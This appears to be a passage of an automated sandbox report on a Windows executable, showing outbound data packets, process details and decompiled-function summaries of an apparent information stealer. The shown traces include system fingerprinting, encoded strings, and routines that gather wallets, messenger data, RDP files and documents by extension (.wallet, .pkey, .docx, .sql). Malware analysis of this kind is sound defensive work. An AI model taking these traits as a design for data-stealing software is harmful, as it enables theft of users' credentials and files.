Dec 26, 2024 12:04:19.385746956 CET	2472	OUT	Data Raw: 2f 5c cd 46 41 c4 d4 fa 32 70 64 33 09 8d 85 df a3 d0 54 57 a6 04 cc ac e2 3c f0 28 f2 08 91 75 18 6a fe 3d 94 0e 00 ed a1 29 dd a1 22 be b8 1e 91 4c ac 23 81 c6 88 e5 7e c8 dd f5 1a 12 e8 31 52 44 df 73 62 6b 85 38 b7 95 cb 19 f2 aa 37 2b 8a d5 Data Ascii: /\FA2pd3TW<(uj=)"L#~1RDsbk87+4K+'xh-80H=_L$\|iG!GC8pns8C-+^YKoUj<&vONNoI)!{ux?;:~k6p
Dec 26, 2024 12:04:19.385792971 CET	2472	OUT	Data Raw: d8 20 1c 02 89 3d d2 62 51 a2 35 4c f8 df d1 91 3b 93 30 c3 8f 9a cc 30 e7 de 73 64 6f d1 d5 70 cc 11 91 c2 e4 ea 2a 98 3d e2 3f 80 f4 c7 1e f5 a2 c1 e9 da 52 ba a9 40 be 67 83 1d 45 aa 66 4b 3f 25 e6 8d dc 1d 9d e4 ac d5 0f fa 69 b8 fc f5 70 e7 Data Ascii: =bQ5L;00sdop*=?R@gEfK?%ip2uv'mG:-@J?!__>,^l1D~JcQ"@K_pLz~;2#w-}{d7Mve~!IJ:]&s
Dec 26, 2024 12:04:19.385807991 CET	2472	OUT	Data Raw: f1 4b 7e 3e e6 f1 ab f4 1d 75 cf a7 c8 77 72 ce bc 53 71 4f 79 b2 54 dd 98 32 85 f6 de a5 c6 7b a6 de a6 1d 55 df 89 6a 51 97 27 84 f0 cf c6 c4 a0 ee 8d 4f a0 5c 37 21 3f f5 b3 59 d4 fb 47 36 fb ba 6b a4 09 89 7c ef f5 9d 6b 9d df d8 79 84 20 a6 Data Ascii: K~>uwrSqOyT2{UjQ'O\7!?YG6k\|ky h(3g?yamYfY?!kW*m6'UUN\|}q9}P[;rT_\|PdS~+cX/"-L\:s$nF}SUM6%JQa&ZX
Dec 26, 2024 12:04:19.428611040 CET	27192	OUT	Data Raw: c0 1c 6f 86 39 2b b1 f1 48 46 6c 9d 8c f2 e2 01 9e 35 d6 a3 b6 05 64 57 23 03 7e 71 e4 aa 1c 69 5e ab 40 10 00 19 25 37 f0 86 40 be 63 16 c9 bb b7 4e 3c c5 8c c5 1c 17 6b 24 92 c9 36 b0 19 f2 f1 6a 90 d9 2a 24 ec ae ae 26 4a 44 21 e8 9c b3 1f 81 Data Ascii: o9+HFl5dW#~qi^@%7@cN<k$6j$&JD!(yAn@TF3QU4KOp/b15Whu# h2d%r~&@,Pt@ix7s=iH2tQO!_4QS%v[pu[U
Dec 26, 2024 12:04:19.549288034 CET	7416	OUT	Data Raw: 16 df c4 47 16 80 fb a7 8e 3f 20 09 66 07 92 f3 46 eb ff 7e 7f c1 db d9 20 01 50 00 35 d8 f2 06 52 0e 05 c0 dd d2 62 fd bf da 52 76 1f f6 ef 24 0f b9 90 bc 72 f0 ff 81 96 91 c3 e5 ff 10 f8 df b9 ba 3f 7c 36 f7 2f 04 ea a8 fe ef 1a e2 fc 93 25 16 Data Ascii: G? fF~ P5RbRv$r?\|6/%1%MhLTup/KclZ&aJ:lvBHOKf">r;7Fy)'(N\|UcX'>2nS"V+Xz>q8$F0W}9t."
Dec 26, 2024 12:04:19.713485956 CET	1236	OUT	Data Raw: 10 00 00 00 18 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 ed 06 00 00 5c 46 69 6c 65 5f 47 72 61 62 62 65 72 5c 69 63 6f 6e 63 61 63 68 65 5f 39 36 2e 64 62 50 4b 01 02 00 00 14 00 00 00 08 00 00 00 20 00 f5 fe ae 0e 10 00 00 00 18 00 00 Data Ascii: \File_Grabber\iconcache_96.dbPK (8\File_Grabber\iconcache_custom_stream.dbPK ?]\File_Grabber\iconcache_exif.dbPK r
Dec 26, 2024 12:04:21.497129917 CET	147	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:04:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8
Dec 26, 2024 12:04:21.497442007 CET	147	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:04:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	06:03:59
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\CwQQqCmqkY.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\CwQQqCmqkY.exe"
Imagebase:	0x7ff7f1280000
File size:	1'014'784 bytes
MD5 hash:	1A477A5659D817B01A50F2A80CB1D76E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	135

Executed Functions

Function 00007FF7F132E23C Relevance: 150.6, APIs: 51, Strings: 34, Instructions: 1808COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00007FF7F132E29F
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF7F132E2D4
GetUserDefaultUILanguage.KERNELBASE ref: 00007FF7F132E2DA
GetDesktopWindow.USER32 ref: 00007FF7F132E2E0
GetClientRect.USER32 ref: 00007FF7F132E2EE
GetUserNameA.ADVAPI32 ref: 00007FF7F132E30C
GetComputerNameA.KERNEL32 ref: 00007FF7F132E327
GetVersionExA.KERNEL32 ref: 00007FF7F132E334
GetCurrentHwProfileA.ADVAPI32 ref: 00007FF7F132E341
GetModuleFileNameA.KERNEL32 ref: 00007FF7F132E356
GetLocaleInfoEx.KERNEL32 ref: 00007FF7F132E5EF
GetSystemFirmwareTable.KERNELBASE ref: 00007FF7F132E73A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132E7BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132E7C0

Strings

Ex0Z, xrefs: 00007FF7F132EEAE
Processor Type: , xrefs: 00007FF7F132E53D
MRoEHzAQEx0ZZ1s=, xrefs: 00007FF7F132EF9A
\Wallets, xrefs: 00007FF7F132FB66
MAwMHQ==, xrefs: 00007FF7F132EDAA
HWID: , xrefs: 00007FF7F132E3F3
MB, xrefs: 00007FF7F132E589
RAM Size: , xrefs: 00007FF7F132E56B
Processor Architecture: , xrefs: 00007FF7F132E4D3
Computer Name: , xrefs: 00007FF7F132E383
Messengers, xrefs: 00007FF7F132FC8B
Diamotrix, xrefs: 00007FF7F132F321
MRoEHzAQEx0ZZ10=, xrefs: 00007FF7F132F16E
MRoEHzAQEx0ZZ1o=, xrefs: 00007FF7F132F084
Number of Processors: , xrefs: 00007FF7F132E51A
Screen Resolution: , xrefs: 00007FF7F132E59D
Page Size: , xrefs: 00007FF7F132E4F7
nfo.txt, xrefs: 00007FF7F132FD8D
x , xrefs: 00007FF7F132E5BC
Wallets, xrefs: 00007FF7F132FB59
RDP.txt, xrefs: 00007FF7F132FE16
IQQOBwY=, xrefs: 00007FF7F132F263
System Language: , xrefs: 00007FF7F132E696
BMSR, xrefs: 00007FF7F132E735
Windows Version: , xrefs: 00007FF7F132E469
\Messengers, xrefs: 00007FF7F132FC98
MwwDGwYRBQ==, xrefs: 00007FF7F132F34A
BIOS Version: , xrefs: 00007FF7F132E744
File_Grabber, xrefs: 00007FF7F132FE8F
GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW, xrefs: 00007FF7F132ECB2
GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==, xrefs: 00007FF7F132EBAD
Install Path: , xrefs: 00007FF7F132E4AC
User Name: , xrefs: 00007FF7F132E35C
\File_Grabber, xrefs: 00007FF7F132FE9C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Name$InfoSystemUser_invalid_parameter_noinfo_noreturn$ClientComputerCurrentDefaultDesktopFileFirmwareGlobalLanguageLocaleMemoryModuleProfileRectStatusTableVersionWindow
String ID: MB$ x $BIOS Version: $BMSR$Computer Name: $Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$HWID: $IQQOBwY=$Install Path: $MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$Number of Processors: $Page Size: $Processor Architecture: $Processor Type: $RAM Size: $RDP.txt$Screen Resolution: $System Language: $User Name: $Wallets$Windows Version: $\File_Grabber$\Messengers$\Wallets$nfo.txt
API String ID: 2650910916-3668073628
Opcode ID: 611cf05ff18014f2846dc4db441deb76e8daa8ca6df2b345875ed45aa5251317
Instruction ID: 71dc3100c6ec65fee5126b9b43cb9efb3206b03184ce10473b691fe1f119ae06
Opcode Fuzzy Hash: 611cf05ff18014f2846dc4db441deb76e8daa8ca6df2b345875ed45aa5251317
Instruction Fuzzy Hash: C603E463E18BC686EB00EB64D4500ADA361FFD5794F90133AE6AD42AD9DFBCE540C790

Function 00007FF7F13312A4 Relevance: 104.8, APIs: 28, Strings: 31, Instructions: 1509COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AC6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332ACC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AD2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AD8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332ADE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AE4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AEA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AF0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332AFC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B02
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B0E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B14
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B1A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B20
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B26
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B2C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B32
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B38
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B3E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B44
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B4A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B50
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B56
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B5C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332B62

Part of subcall function 00007FF7F132C560: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132C65A

Part of subcall function 00007FF7F12902D0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12903CC

Part of subcall function 00007FF7F128F840: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128F89B

Part of subcall function 00007FF7F128A36C: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128A3C1

Strings

Diamotrix, xrefs: 00007FF7F1332272
IQMDDAMWEwIXNAUCBQMTGgwbIAgNAAoRFwgSKgAMBQI=, xrefs: 00007FF7F133214C
,, xrefs: 00007FF7F13316F3
LAQEAg0aFAceJwQFBgsXHwUaKA4ACgISAg8aKwAEDAk=, xrefs: 00007FF7F1331D65
KgIDBAcSEAwXIwgEDAARGgUdIgcKAgsWFw8fNA4KAwE=, xrefs: 00007FF7F13316FC
1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQMFAA4=, xrefs: 00007FF7F13319C9
Diamotrix, xrefs: 00007FF7F1331FDA
IQ41NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyINA4FHQc=, xrefs: 00007FF7F13317EC
KA4DBwcQGQMVNA4LCgwWEQ0ULAIOBgQXGRkSKQwFCgw=, xrefs: 00007FF7F1332000
Diamotrix, xrefs: 00007FF7F1331B79
Diamotrix, xrefs: 00007FF7F1331D3F
NAEKDw4ZFw8RKg4GAA4fFQIUNAINBwUZFQAaKwEPDw4=, xrefs: 00007FF7F1331F25
LA0OBgYRGAcILQQABgoQGggSLA0NDgoTFxkULQYABQs=, xrefs: 00007FF7F13320A6
KwMGCgIXGgUfLAcLAQ4EHw8aKgMJAgMSGAIRLQ0DDgc=, xrefs: 00007FF7F1331C82
KxkCCh8SHwAILQ0DCh8RHAEVJQMODAUEEAYaNBkFBAM=, xrefs: 00007FF7F1331B9F
GDUmAgATHgwkGCoJHwAZFzUkERoEH08wEx0ZGDUlCAkVBwUMGDUtAgwVHkk9PB0EAxwdHQdYFwwVGQYaFRo=, xrefs: 00007FF7F1331321
GDUsBAwGHRoXIh091NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQAXEwVYAREVCAEHGwYWZDoEGRsdHA4L, xrefs: 00007FF7F1331429
NAsRBwQXHg0SLQ8HDgcTEAsWIAQJAgUdEwoaIw8NBQ4=, xrefs: 00007FF7F13321F2
IREOCRoHXB4ZKAUEGQ==, xrefs: 00007FF7F1331609
Diamotrix, xrefs: 00007FF7F1332126
IgoHDgkYHg8WIAUOAAscEAwQLgMCAgYZEA4XIg0PDgg=, xrefs: 00007FF7F1331E48
1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgy=, xrefs: 00007FF7F133229B
IgEDAgcdHwgdKAsOBR8eEAsUIAoPCgwaExkWIAYFBx8=, xrefs: 00007FF7F1331AB6
Diamotrix, xrefs: 00007FF7F13321CC
Diamotrix, xrefs: 00007FF7F1331E22
Diamotrix, xrefs: 00007FF7F1331F00
Diamotrix, xrefs: 00007FF7F1331C5C
Diamotrix, xrefs: 00007FF7F1332080
GDUkFQAQBxokGA==, xrefs: 00007FF7F1331519
KQoOBQYYHAoaIggJDwITFgMTJhkEAAwXGwAXKA4CCgo=, xrefs: 00007FF7F13318D9
\*.*, xrefs: 00007FF7F1332DD0

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: ,$1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgy=$1NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQMFAA4=$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$Diamotrix$GDUkFQAQBxokGA==$GDUmAgATHgwkGCoJHwAZFzUkERoEH08wEx0ZGDUlCAkVBwUMGDUtAgwVHkk9PB0EAxwdHQdYFwwVGQYaFRo=$GDUsBAwGHRoXIh091NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyIQAXEwVYAREVCAEHGwYWZDoEGRsdHA4L$IQ41NfB14ikSwU5oDzNYQh7b35gksJRQW9bgyINA4FHQc=$IQMDDAMWEwIXNAUCBQMTGgwbIAgNAAoRFwgSKgAMBQI=$IREOCRoHXB4ZKAUEGQ==$IgEDAgcdHwgdKAsOBR8eEAsUIAoPCgwaExkWIAYFBx8=$IgoHDgkYHg8WIAUOAAscEAwQLgMCAgYZEA4XIg0PDgg=$KA4DBwcQGQMVNA4LCgwWEQ0ULAIOBgQXGRkSKQwFCgw=$KQoOBQYYHAoaIggJDwITFgMTJhkEAAwXGwAXKA4CCgo=$KgIDBAcSEAwXIwgEDAARGgUdIgcKAgsWFw8fNA4KAwE=$KwMGCgIXGgUfLAcLAQ4EHw8aKgMJAgMSGAIRLQ0DDgc=$KxkCCh8SHwAILQ0DCh8RHAEVJQMODAUEEAYaNBkFBAM=$LA0OBgYRGAcILQQABgoQGggSLA0NDgoTFxkULQYABQs=$LAQEAg0aFAceJwQFBgsXHwUaKA4ACgISAg8aKwAEDAk=$NAEKDw4ZFw8RKg4GAA4fFQIUNAINBwUZFQAaKwEPDw4=$NAsRBwQXHg0SLQ8HDgcTEAsWIAQJAgUdEwoaIw8NBQ4=$\*.*
API String ID: 3936042273-491062771
Opcode ID: 5494cb3126ffeae7d3fb69440a20562dbea0d196dce64852b158d1e03fa1fc3f
Instruction ID: e2ec9cd9836681e8efc99228ac4b5f8e589b7b5dcbfb26989a5a31d44d6e5d68
Opcode Fuzzy Hash: 5494cb3126ffeae7d3fb69440a20562dbea0d196dce64852b158d1e03fa1fc3f
Instruction Fuzzy Hash: FEE2B363E19BC686EB10EB74D4500FDA321FF95394F905326E6AD529DADFACE240C390

Function 00007FF7F132EB30 Relevance: 88.8, APIs: 32, Strings: 18, Instructions: 1312COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9C6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA02
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA0E
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FADB
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FAF1

Part of subcall function 00007FF7F132C560: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132C65A

Part of subcall function 00007FF7F12902D0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7F12903CC

Strings

Ex0Z, xrefs: 00007FF7F132EEAE
MRoEHzAQEx0ZZ1s=, xrefs: 00007FF7F132EF9A
\Wallets, xrefs: 00007FF7F132FB66
nfo.txt, xrefs: 00007FF7F132FD8D
Wallets, xrefs: 00007FF7F132FB59
RDP.txt, xrefs: 00007FF7F132FE16
IQQOBwY=, xrefs: 00007FF7F132F263
MAwMHQ==, xrefs: 00007FF7F132EDAA
MwwDGwYRBQ==, xrefs: 00007FF7F132F34A
\Messengers, xrefs: 00007FF7F132FC98
File_Grabber, xrefs: 00007FF7F132FE8F
GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW, xrefs: 00007FF7F132ECB2
Messengers, xrefs: 00007FF7F132FC8B
GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==, xrefs: 00007FF7F132EBAD
Diamotrix, xrefs: 00007FF7F132F321
MRoEHzAQEx0ZZ10=, xrefs: 00007FF7F132F16E
MRoEHzAQEx0ZZ1o=, xrefs: 00007FF7F132F084
\File_Grabber, xrefs: 00007FF7F132FE9C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Directory$Concurrency::cancel_current_taskCreateCurrent
String ID: Diamotrix$Ex0Z$File_Grabber$GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==$GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW$IQQOBwY=$MAwMHQ==$MRoEHzAQEx0ZZ10=$MRoEHzAQEx0ZZ1o=$MRoEHzAQEx0ZZ1s=$Messengers$MwwDGwYRBQ==$RDP.txt$Wallets$\File_Grabber$\Messengers$\Wallets$nfo.txt
API String ID: 4040021279-1265026603
Opcode ID: c2728f9c4670e31866b708728e7fd16e3e167682e0f77b9633d6d489b83192e3
Instruction ID: 03ea547d7983173d8c137d68cbc885b4ee2e9e17b5ed2916856ef5e73f021966
Opcode Fuzzy Hash: c2728f9c4670e31866b708728e7fd16e3e167682e0f77b9633d6d489b83192e3
Instruction Fuzzy Hash: 3DD2BF63E18BC683EB00EB64D4500ADA361FFD5794F901326F6AD52AD9DFACE540C790

Function 00007FF7F132DDD8 Relevance: 63.2, APIs: 20, Strings: 16, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfW.USER32 ref: 00007FF7F132DE11
FindFirstFileW.KERNELBASE ref: 00007FF7F132DE23
wsprintfW.USER32 ref: 00007FF7F132DE7F
PathFindExtensionW.SHLWAPI ref: 00007FF7F132DE8C
StrCmpIW.SHLWAPI ref: 00007FF7F132DE9F
StrCmpIW.SHLWAPI ref: 00007FF7F132DEB7
StrCmpIW.SHLWAPI ref: 00007FF7F132DECF
StrCmpIW.SHLWAPI ref: 00007FF7F132DEE7
StrCmpIW.SHLWAPI ref: 00007FF7F132DEFF
StrCmpIW.SHLWAPI ref: 00007FF7F132DF17
StrCmpIW.SHLWAPI ref: 00007FF7F132DF2F
StrCmpIW.SHLWAPI ref: 00007FF7F132DF43
StrCmpIW.SHLWAPI ref: 00007FF7F132DF57
StrCmpIW.SHLWAPI ref: 00007FF7F132DF6B
StrCmpIW.SHLWAPI ref: 00007FF7F132DF7F
StrCmpIW.SHLWAPI ref: 00007FF7F132DF93
StrCmpIW.SHLWAPI ref: 00007FF7F132DFA7
wsprintfW.USER32 ref: 00007FF7F132E012
FindNextFileW.KERNELBASE ref: 00007FF7F132E03F
FindClose.KERNELBASE ref: 00007FF7F132E050

Strings

.pdf, xrefs: 00007FF7F132DEC5
.pkey, xrefs: 00007FF7F132DF9D
.docx, xrefs: 00007FF7F132DEDD
%s\*, xrefs: 00007FF7F132DE03
%s\%s, xrefs: 00007FF7F132DE71
.dat, xrefs: 00007FF7F132DF75
.txt, xrefs: 00007FF7F132DE95
.db, xrefs: 00007FF7F132DF25
., xrefs: 00007FF7F132DFD8
.wallet, xrefs: 00007FF7F132DF89
.jpg, xrefs: 00007FF7F132DEAD
%s\%s, xrefs: 00007FF7F132E004
.py, xrefs: 00007FF7F132DF39
.cpp, xrefs: 00007FF7F132DF4D
.csv, xrefs: 00007FF7F132DEF5
.sql, xrefs: 00007FF7F132DF0D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Find$wsprintf$File$CloseExtensionFirstNextPath
String ID: %s\%s$%s\%s$%s\*$.$.cpp$.csv$.dat$.db$.docx$.jpg$.pdf$.pkey$.py$.sql$.txt$.wallet
API String ID: 3740071514-485090699
Opcode ID: 5e8ed4e0d74950a1803d94b8335d5763838339ad019a5827a8596f3473a7e5c3
Instruction ID: abb9c0c90aca70b15c0a657eeeaa2dadcc7e7b48050a788fd964460936a3fb1a
Opcode Fuzzy Hash: 5e8ed4e0d74950a1803d94b8335d5763838339ad019a5827a8596f3473a7e5c3
Instruction Fuzzy Hash: F6713A21A08A8793FB64BB11E8506B5E360FF44B84FC4507AC92D466D8DFBCF549E3A4

Function 00007FF7F132E7CC Relevance: 60.9, APIs: 16, Strings: 18, Instructions: 1440COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1330628: SHGetFolderPathW.SHELL32 ref: 00007FF7F1330658

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132EB21

Part of subcall function 00007FF7F13306C8: FindFirstFileW.KERNELBASE ref: 00007FF7F1330722
Part of subcall function 00007FF7F13306C8: CreateDirectoryW.KERNEL32 ref: 00007FF7F1330825

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132EB1B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9E4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9EA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9F0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132F9FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA02
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA08
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F132FA0E
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FADB
CreateDirectoryW.KERNELBASE ref: 00007FF7F132FAF1
SetCurrentDirectoryW.KERNELBASE ref: 00007FF7F132FB3A

Strings

Ex0Z, xrefs: 00007FF7F132EEAE
MRoEHzAQEx0ZZ1s=, xrefs: 00007FF7F132EF9A
\Wallets, xrefs: 00007FF7F132FB66
nfo.txt, xrefs: 00007FF7F132FD8D
Wallets, xrefs: 00007FF7F132FB59
RDP.txt, xrefs: 00007FF7F132FE16
IQQOBwY=, xrefs: 00007FF7F132F263
MAwMHQ==, xrefs: 00007FF7F132EDAA
MwwDGwYRBQ==, xrefs: 00007FF7F132F34A
\Messengers, xrefs: 00007FF7F132FC98
File_Grabber, xrefs: 00007FF7F132FE8F
GDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsW, xrefs: 00007FF7F132ECB2
Messengers, xrefs: 00007FF7F132FC8B
GDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==, xrefs: 00007FF7F132EBAD
Diamotrix, xrefs: 00007FF7F132F321
MRoEHzAQEx0ZZ10=, xrefs: 00007FF7F132F16E
MRoEHzAQEx0ZZ1o=, xrefs: 00007FF7F132F084
\File_Grabber, xrefs: 00007FF7F132FE9C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
